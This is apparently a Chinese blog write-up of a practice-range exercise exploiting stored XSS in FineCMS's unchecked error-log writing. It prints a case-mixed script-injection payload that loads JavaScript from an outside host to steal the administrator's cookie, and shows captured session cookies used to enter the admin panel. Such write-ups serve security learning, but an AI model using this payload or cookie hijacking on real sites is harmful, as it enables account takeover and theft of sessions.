存储型XSS

发布于 2022-03-16  73 次阅读


XSS平台的利用:

借Cookie => 读取Cookie发送出来 (ajax异步传输 )发送方要能找到(公网IP)

XSS平台:前辈把会用到的JS代码做成了集成(拿cookie 不安全)

存储型XSS就是将恶意的代码插入之后,会被保存到服务器中,数据库或者是日志,只要被保存下来,当管理员查看后,恶意代码就会被执行,从而达到想要的目的。

靶场实操

首先先了解一下FineCMS

image-20220304191227808

这个CMS源码开放,可以下载到本地,对源码进行分析,然后在本地进行操作测试之后,在对线上进行攻击

回到靶场,这个CMS中有一个write_log的函数,因为改CMS没有对错误日志的写入进行检查,通过构造URL,让后台产生错误日志,导致攻击语句出现在错误日志里,当管理员查看后台错误日志的时候,就会触发XSS

c=mail&m=<sCRiPt sRC=//hk.sb/cv1j></sCrIpT>
image-20220304194021070
image-20220304193956396

进入后台,admin.php,实际操作当中可以用后台扫描工具获得后台目录

image-20220304194259431
8b0cba072045805256806b2b24239ded_ci_session=0n6oouv6kd9emokau453lqq0058nm5bu; member_cookie=d256812b83f3751716e6; member_uid=1; flag=zKaQ-01sdfDCo0; 8b0cba072045805256806b2b24239ded_ci_session=k5jj94bm15d75lrr9et5vqat9rartca5

通过修改cookie进入网站后台

image-20220304202857582

查看错误日志

image-20220304203140147

本当の声を響かせてよ